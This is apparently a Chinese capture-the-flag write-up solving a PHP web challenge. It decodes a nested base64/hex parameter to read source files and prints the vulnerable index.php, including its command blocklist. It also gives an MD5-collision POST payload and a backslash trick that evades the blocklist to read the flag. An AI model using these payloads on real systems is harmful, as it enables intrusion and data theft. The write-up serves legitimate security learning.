[安洵杯 2019]easy_web 1

---

1. 打开网页，发现这个链接有点意思

   http://872e4250-c732-4f34-9885-47749e67e42c.node4.buuoj.cn:81/index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=

   这一看就是有意思的，TXpVek5UTTFNbVUzTURabE5qYz0 这个应该是一个base64加密，解密之后为 MzUzNTM1MmU3MDZlNjc= 在解密： 3535352e706e67 这是个什么鬼啊，想了半天可能是十六进制解密的 555.png ，这个也不知道什么用先看后面 有个 cmd ，这意思是会执行 cmd 命令，试一试
   2.

   http://872e4250-c732-4f34-9885-47749e67e42c.node4.buuoj.cn:81/index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=ls

   
   这里需要你多刷新，或者直接看页面源代码就可以看到，这个意思是拦截了，这也不知道拦截了那些，返回开始的起点，看看 img 参数可以搞出源代码不

2. 首先这个 img 参数是一个 555.png 这是读取一个图片，那我们大胆猜测一下我们可以利用这个参数读取源代码 index.php ,创建 payload : http://872e4250-c732-4f34-9885-47749e67e42c.node4.buuoj.cn:81/index.php?img=TmprMlpUWTBOalUzT0RKbE56QTJPRGN3&cmd=
   对返回的数据解密的：

   <?php
       error_reporting(E_ALL || ~ E_NOTICE);
       header('content-type:text/html;charset=utf-8');
       $cmd = $_GET['cmd'];
       if (!isset($_GET['img']) || !isset($_GET['cmd']))
           header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
       $file = hex2bin(base64_decode(base64_decode($_GET['img'])));
   
       $file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
       if (preg_match("/flag/i", $file)) {
           echo '<img src ="./ctf3.jpeg">';
           die("xixi～ no flag");
       } else {
           $txt = base64_encode(file_get_contents($file));
           echo "<img src='data:image/gif;base64," . $txt . "'></img>";
           echo "<br>";
       }
       echo $cmd;
       echo "<br>";
       if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
           echo("forbid ~");
           echo "<br>";
       } else {
           if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
               echo `$cmd`;
           } else {
               echo ("md5 is funny ~");
           }
       }
   
   ?>
   <html>
   <style>
       body{
           background:url(./bj.png)  no-repeat center center;
           background-size:cover;
           background-attachment:fixed;
           background-color:#CCCCCC;
       }
   </style>
   <body>
   </body>
   </html>
   

   我们可以知道拦截了那些函数以及该如何绕过，绕过的关键在于 if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b']))
   这里的MD5得使用强绕过，不能使用数组绕过，因为这里使用了String强转换，数组都被强制转换为了string(5) “Array”
   使用的 payload :
   a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2&=

   

   在这个里面没有我们想要的数据，所以我们可以换一个目录

   
   我们发现了现在我们要读取，但是基本上所有读取的已经被拦截了，但是在 linux命令中可以加\，所以甚至可以ca\t /fl\ag ，就可以了

总结

1. 我们有时候要通过一些参数对函数进行大胆的猜有可能会有奇效
2. 通过一些参数的值猜解，判断是否可以利用